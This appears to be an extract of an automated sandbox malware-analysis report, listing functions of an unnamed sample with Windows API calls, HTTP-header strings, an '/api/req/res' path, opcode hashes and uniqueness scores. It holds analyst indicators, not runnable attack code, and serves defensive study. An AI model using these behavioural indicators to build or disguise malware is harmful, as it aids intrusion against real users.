                                  • API ID: ErrorHttpLastOpen
                                  • String ID: <$Content-Length: {[0-9]+}$Cookie: $GET$Location: {[0-9]+}$POST$Set-Cookie:\b*{.+?}\n$charset={[A-Za-z0-9\-_]+}$utf-8${</html>}${<html>}
                                  • API String ID: 377367503-1096743455
                                  • Opcode ID: a4132a4f129798fa624973b48dc136b55aa80bf06eca1e198f5cd3672be7afb6
                                  • Instruction ID: 528592aa65abb9733495732e93c9f544735771af751af8f44151b22ea0c16af1
                                  • Opcode Fuzzy Hash: a4132a4f129798fa624973b48dc136b55aa80bf06eca1e198f5cd3672be7afb6
                                  • Instruction Fuzzy Hash: B5B27F70A006599BDB28DF24DC45BEAF7B5FF04304F1041DAE549A7281EBB4AAD4CF91
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00C0E31E, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00C06F6D: GetLastError.KERNEL32(00000008,?,00000000,00C0C55A,00BF591B,00BF5961,?,00BF57A8,00000000), ref: 00C06F72
                                    • Part of subcall function 00C06F6D: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00BF57A8,00000000), ref: 00C07010
                                  • GetACP.KERNEL32(?,?,?,?,?,?,00C04253,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00C0E3DF
                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00C04253,?,?,?,00000055,?,-00000050,?,?), ref: 00C0E40A
                                  • _wcschr.LIBVCRUNTIME ref: 00C0E49E
                                  • _wcschr.LIBVCRUNTIME ref: 00C0E4AC
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00C0E56D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                  • String ID: utf8
                                  • API String ID: 4147378913-905460609
                                  • Opcode ID: 71ac8bae55bf2175679925ce1d8c41190dbfe79d0cc02b1f27f3a0084cdbc370
                                  • Instruction ID: 146d44266fb0933737d29cc06b77873c1969b3a0c68e858e03a384e5ec51f49d
                                  • Opcode Fuzzy Hash: 71ac8bae55bf2175679925ce1d8c41190dbfe79d0cc02b1f27f3a0084cdbc370
                                  • Instruction Fuzzy Hash: 8571F731680306AAE724AB75CC46BBB77A8EF49704F144C69F916DB1C1FB70EA40DB61
                                  Uniqueness

                                  Uniqueness Score: 1.91%

                                  Function 00C11F1C, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __floor_pentium4
                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                  • API String ID: 4168288129-2761157908
                                  • Opcode ID: 4b1996d51f35ce62809cae86b6528e0101e919a90051aeb177bb3d6c9d4de56f
                                  • Instruction ID: ac2988672236dcb68e48e231aeb0e95b683bb1abf889a5182dd066f80413a5b1
                                  • Opcode Fuzzy Hash: 4b1996d51f35ce62809cae86b6528e0101e919a90051aeb177bb3d6c9d4de56f
                                  • Instruction Fuzzy Hash: 8BC24975E046288FDB24CE28DD407EAB3B5EB4A305F1441EAD85DE7240E778AED5AF40
                                  Uniqueness

                                  Uniqueness Score: 0.09%

                                  Function 00C0EAAA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetLocaleInfoW.KERNEL32(00000000,2000000B,00C0EDC8,00000002,00000000,?,?,?,00C0EDC8,?,00000000), ref: 00C0EB43
                                  • GetLocaleInfoW.KERNEL32(00000000,20001004,00C0EDC8,00000002,00000000,?,?,?,00C0EDC8,?,00000000), ref: 00C0EB6C
                                  • GetACP.KERNEL32(?,?,00C0EDC8,?,00000000), ref: 00C0EB81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID: ACP$OCP
                                  • API String ID: 2299586839-711371036
                                  • Opcode ID: 1553b80005686e40e7d37cb3d9fbffb9b6016e3c9ba34bfb41f01eb5161cde62
                                  • Instruction ID: 9da916da06d936bc324095f76597eb4c3d5a6226ea8c559cb71a762e5c215a30
                                  • Opcode Fuzzy Hash: 1553b80005686e40e7d37cb3d9fbffb9b6016e3c9ba34bfb41f01eb5161cde62
                                  • Instruction Fuzzy Hash: 9421D322780111EBDB348F56C940BEB77A6BF54B64F268824E91BC7290E732DF40D354
                                  Uniqueness

                                  Uniqueness Score: 0.03%

                                  Function 00C0EC7F, Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00C06F6D: GetLastError.KERNEL32(00000008,?,00000000,00C0C55A,00BF591B,00BF5961,?,00BF57A8,00000000), ref: 00C06F72
                                    • Part of subcall function 00C06F6D: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00BF57A8,00000000), ref: 00C07010
                                    • Part of subcall function 00C06F6D: _free.LIBCMT ref: 00C06FCF
                                    • Part of subcall function 00C06F6D: _free.LIBCMT ref: 00C07005
                                  • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00C0ED8B
                                  • IsValidCodePage.KERNEL32(00000000), ref: 00C0EDD4
                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00C0EDE3
                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00C0EE2B
                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00C0EE4A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                  • String ID:
                                  • API String ID: 949163717-0
                                  • Opcode ID: 74d85865fd8c1060b21be00e87c9ac52e093e086bcb63df6341daf403a67bd44
                                  • Instruction ID: 62f4ed4d54c6013e9ebf453bf42d37a1b0069d0d6cb004fbdf51fed1617cc190
                                  • Opcode Fuzzy Hash: 74d85865fd8c1060b21be00e87c9ac52e093e086bcb63df6341daf403a67bd44
                                  • Instruction Fuzzy Hash: BA516D71A40319ABDB20EFA5DC41BBE77B8FF09700F184869B925E71D1E7709A44CB61
                                  Uniqueness

                                  Uniqueness Score: 0.13%

                                  Function 00C01195, Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00C0128D
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00C01297
                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00C012A4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                  • String ID:
                                  • API String ID: 3906539128-0
                                  • Opcode ID: 7e1047e8c8c0ce1729b20f27e5d54e4a9e7be704a437cabee24ec2d7cb212521
                                  • Instruction ID: 5e7c18dedbef946dd96ab942aea0bf192cf18bbcb11d6cad47429fec9bf67daa
                                  • Opcode Fuzzy Hash: 7e1047e8c8c0ce1729b20f27e5d54e4a9e7be704a437cabee24ec2d7cb212521
                                  • Instruction Fuzzy Hash: F231B17490122CABCB21DF64D8897DDBBF8BF08310F5041EAE91CA7291EB709B858F45
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Function 00BD3FB0, Relevance: 4.5, APIs: 3, Instructions: 47COMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadResource.KERNEL32(00000000,00000000,00000001,00000000,00000001,?,00BE709C,00BD9B48,?,?,00000000,?,?,00BD9B48,?), ref: 00BD3FBC
                                  • LockResource.KERNEL32(00000000,?,00BE709C,00BD9B48,?,?,00000000,?,?,00BD9B48,?,?,?,?,/api/req/res,0000000C), ref: 00BD3FC7
                                  • SizeofResource.KERNEL32(00000000,00000000,?,00BE709C,00BD9B48,?,?,00000000,?,?,00BD9B48,?,?,?,?,/api/req/res), ref: 00BD3FD5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Resource$LoadLockSizeof
                                  • String ID:
                                  • API String ID: 2853612939-0
                                  • Opcode ID: 1d131ac94f86875a7531f0cf07510b6df0fe3784b0d49bffb31cecaa2259bf7a
                                  • Instruction ID: 2088143198f1ae1111bd6e0bfe0db2fae3825bb12d7cab3dda1cd506cc92bb16
                                  • Opcode Fuzzy Hash: 1d131ac94f86875a7531f0cf07510b6df0fe3784b0d49bffb31cecaa2259bf7a
                                  • Instruction Fuzzy Hash: 5EF04633A012255B8B301B5AAC58ABBF7ECEB85725301497BFA0AD3210F672DC4082D0
                                  Uniqueness

                                  Uniqueness Score: 0.24%

                                  Function 00BD40F0, Relevance: 4.5, APIs: 3, Instructions: 46memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000), ref: 00BD4130
                                  • __Init_thread_footer.LIBCMT ref: 00BD415B
                                    • Part of subcall function 00BF45F5: EnterCriticalSection.KERNEL32(00C2F1D8,?,00C3013C,?,00BD4124,00C301A8,00C3013C,00BD834F,5CB9E59C,0000000F,?,00000000), ref: 00BF4600
                                    • Part of subcall function 00BF45F5: LeaveCriticalSection.KERNEL32(00C2F1D8,?,00C3013C,?,00BD4124,00C301A8,00C3013C,00BD834F,5CB9E59C,0000000F,?,00000000), ref: 00BF463D
                                  • __Init_thread_footer.LIBCMT ref: 00BD41CD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalInit_thread_footerSection$EnterHeapLeaveProcess
                                  • String ID:
                                  • API String ID: 3363689876-0
                                  • Opcode ID: ac006cc97c3da1f4734513d9f033ce1c425da5d81924e15e11f43d03a6975999
                                  • Instruction ID: 1091aa7cf7ccb86b3861e65eb383dff6f465344f2a781fbc11c45f4aefdc1600
                                  • Opcode Fuzzy Hash: ac006cc97c3da1f4734513d9f033ce1c425da5d81924e15e11f43d03a6975999
                                  • Instruction Fuzzy Hash: 58115EB3560700CFE390EF68AC6779E3BE0E726720F3441A5D295572A1E3B05488EB52
                                  Uniqueness

                                  Uniqueness Score: 8.94%

                                  Function 00C00820, Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4ff58f259cf8b1458e23932582cbed66111991d9305575332ac2f5ab185b11b1
                                  • Instruction ID: d15a0050c22d5637b8e963cff78bdf53d790230f455013b95c25405b61d285b2
                                  • Opcode Fuzzy Hash: 4ff58f259cf8b1458e23932582cbed66111991d9305575332ac2f5ab185b11b1
                                  • Instruction Fuzzy Hash: 5BF14071E012199FDF14CFA9C8807AEB7B1FF49314F268269D929A7385D731AE41CB90
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 00BDEC90, Relevance: 3.2, APIs: 2, Instructions: 209comCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 00BDECE9
                                  • CoCreateInstance.OLE32(00C1A2C0,00000000,00000001,00C1A2B0,?), ref: 00BDED08
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInitializeInstance
                                  • String ID:
                                  • API String ID: 3519745914-0
                                  • Opcode ID: 141d7a9828a71b25d0530bcc8f008abaae59d07222071255143ea1a91314e5cd
                                  • Instruction ID: bbea50e39921656749cc09d746a0f940e4a9948b844f0d7b46bfc13cd86241ab
                                  • Opcode Fuzzy Hash: 141d7a9828a71b25d0530bcc8f008abaae59d07222071255143ea1a91314e5cd
                                  • Instruction Fuzzy Hash: 69812875E002089FDB00DFA8C948BEDB7B9FF49314F1445A9E819AB391DB36A945CF60
                                  Uniqueness

                                  Uniqueness Score: 1.15%

                                  Function 00C10192, Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00C1018D,?,?,00000008,?,?,00C15263,00000000), ref: 00C103BF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionRaise
                                  • String ID:
                                  • API String ID: 3997070919-0
                                  • Opcode ID: afeae955f0910acf49c22b4272a532969a2757269b750ac400aac1526b36d423
                                  • Instruction ID: 99c835564165704eb89a2f644dbeb1a6e67173887ef25629a79a6d5382710145
                                  • Opcode Fuzzy Hash: afeae955f0910acf49c22b4272a532969a2757269b750ac400aac1526b36d423
                                  • Instruction Fuzzy Hash: 5DB15D31210608DFD714CF28C48ABA57BA0FF46364F758658E9A9CF2A1C375EAD2DB40
                                  Uniqueness

                                  Uniqueness Score: 0.03%

                                  Function 00BF5007, Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                  Download Yara Rule
                                  APIs
                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00BF501D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FeaturePresentProcessor
                                  • String ID:
                                  • API String ID: 2325560087-0
                                  • Opcode ID: c2c12b2d0cb2fd6a1159a1123eeaa3fe854f05676f3ac754ce0b1c0c7dcf7704
                                  • Instruction ID: 62950c99e17fb202d0b1c348fcb05fb624f9fba9293f9aa5990aa6d0dce2c2f9
                                  • Opcode Fuzzy Hash: c2c12b2d0cb2fd6a1159a1123eeaa3fe854f05676f3ac754ce0b1c0c7dcf7704
                                  • Instruction Fuzzy Hash: 6151B6B1910A098FDB34CF58D985BAEBBF0FB44310F24857ACA45FB250D3B49A46DB90
                                  Uniqueness

                                  Uniqueness Score: 0.07%

                                  Function 00C0E60B, Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00C06F6D: GetLastError.KERNEL32(00000008,?,00000000,00C0C55A,00BF591B,00BF5961,?,00BF57A8,00000000), ref: 00C06F72
                                    • Part of subcall function 00C06F6D: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00BF57A8,00000000), ref: 00C07010
                                  • EnumSystemLocalesW.KERNEL32(00C0E731,00000001,00000000,?,-00000050,?,00C0ED5F,00000000,?,?,?,00000055,?), ref: 00C0E67D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$EnumLocalesSystem
                                  • String ID:
                                  • API String ID: 2417226690-0
                                  • Opcode ID: 9b403fb12938bd48fc365c736311c9974ed775c057ac384597950415141114c0
                                  • Instruction ID: 01342bf87b3e800739442424a270584a48907ab7022d66c9dd31353b28dd976b
                                  • Opcode Fuzzy Hash: 9b403fb12938bd48fc365c736311c9974ed775c057ac384597950415141114c0
                                  • Instruction Fuzzy Hash: 7911293A2007055FDB189F39D8916BAB791FF80318B19482DE95747B80D7727942CB40
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Function 00C0E6A6, Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00C06F6D: GetLastError.KERNEL32(00000008,?,00000000,00C0C55A,00BF591B,00BF5961,?,00BF57A8,00000000), ref: 00C06F72
                                    • Part of subcall function 00C06F6D: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00BF57A8,00000000), ref: 00C07010
                                  • EnumSystemLocalesW.KERNEL32(00C0E984,00000001,?,?,-00000050,?,00C0ED23,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00C0E6F0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$EnumLocalesSystem
                                  • String ID:
                                  • API String ID: 2417226690-0
                                  • Opcode ID: 848d272f012589327e3b8f797199107b5d08630cd1587faaac05653d982f6fb3
                                  • Instruction ID: 6419d9930c29970b564d161dcd1538afee9e0622aa98235078f50fa4212ea02b
                                  • Opcode Fuzzy Hash: 848d272f012589327e3b8f797199107b5d08630cd1587faaac05653d982f6fb3
                                  • Instruction Fuzzy Hash: 48F0F6363403045FDB245F39D885B7A7B95FF80768F05482DF9458B6D1D6729D02D650
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Function 00C09396, Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00C052FB: EnterCriticalSection.KERNEL32(?,?,00C02803,00000000,00C2CDD0,0000000C,00C027CA,?,?,00C068A9,?,?,00C0710F,00000001,00000364,00000006), ref: 00C0530A
                                  • EnumSystemLocalesW.KERNEL32(00C09389,00000001,00C2D030,0000000C,00C097B4,00000000), ref: 00C093CE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                  • String ID:
                                  • API String ID: 1272433827-0
                                  • Opcode ID: e869ccb1de98f8aadcfb17433c82aa02881036930e81128dc17152c964bf8d7b
                                  • Instruction ID: fc4fc7944ede7a7f378619c716de6480e084635ab910e2b273b481869b6f5847
                                  • Opcode Fuzzy Hash: e869ccb1de98f8aadcfb17433c82aa02881036930e81128dc17152c964bf8d7b
                                  • Instruction Fuzzy Hash: 95F04932A10204DFDB10DF98E942B9DB7F0EB49720F10412AF511DB2E1CB755902DF50
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Function 00C0E5C0, Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00C06F6D: GetLastError.KERNEL32(00000008,?,00000000,00C0C55A,00BF591B,00BF5961,?,00BF57A8,00000000), ref: 00C06F72
                                    • Part of subcall function 00C06F6D: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00BF57A8,00000000), ref: 00C07010
                                  • EnumSystemLocalesW.KERNEL32(00C0E519,00000001,?,?,?,00C0ED81,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00C0E5F7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$EnumLocalesSystem
                                  • String ID:
                                  • API String ID: 2417226690-0
                                  • Opcode ID: df51725714ab6da7b0989b356e81530f4598e64f95227eac95601689ce38be62
                                  • Instruction ID: 19b2cdd4f6ae9fa865db564eba62940eed3cb2445c723cae5b18c096867dad6d
                                  • Opcode Fuzzy Hash: df51725714ab6da7b0989b356e81530f4598e64f95227eac95601689ce38be62
                                  • Instruction Fuzzy Hash: 82F0553A34020597CB14AF35EC09B6A7F94EFC1B18B064469FA058B681D672A942C750
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Function 00C098B8, Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00C04DD0,?,20001004,00000000,00000002,?,?,00C043BB), ref: 00C098EC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID:
                                  • API String ID: 2299586839-0
                                  • Opcode ID: b16d251bc493170cbf524593a4d74629491b84b5913319d160cc2347ef5a1a60
                                  • Instruction ID: e7ad1c3e9b091d29d562eda055a0f4885f060329f07ff2e685477a02cb090230
                                  • Opcode Fuzzy Hash: b16d251bc493170cbf524593a4d74629491b84b5913319d160cc2347ef5a1a60
                                  • Instruction Fuzzy Hash: 88E04F35501229BBCF122F61DC08BAE7E15FF46760F10C020FC15652A2CB328D21FAD1
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 00BFB99E, Relevance: 1.5, Strings: 1, Instructions: 239COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
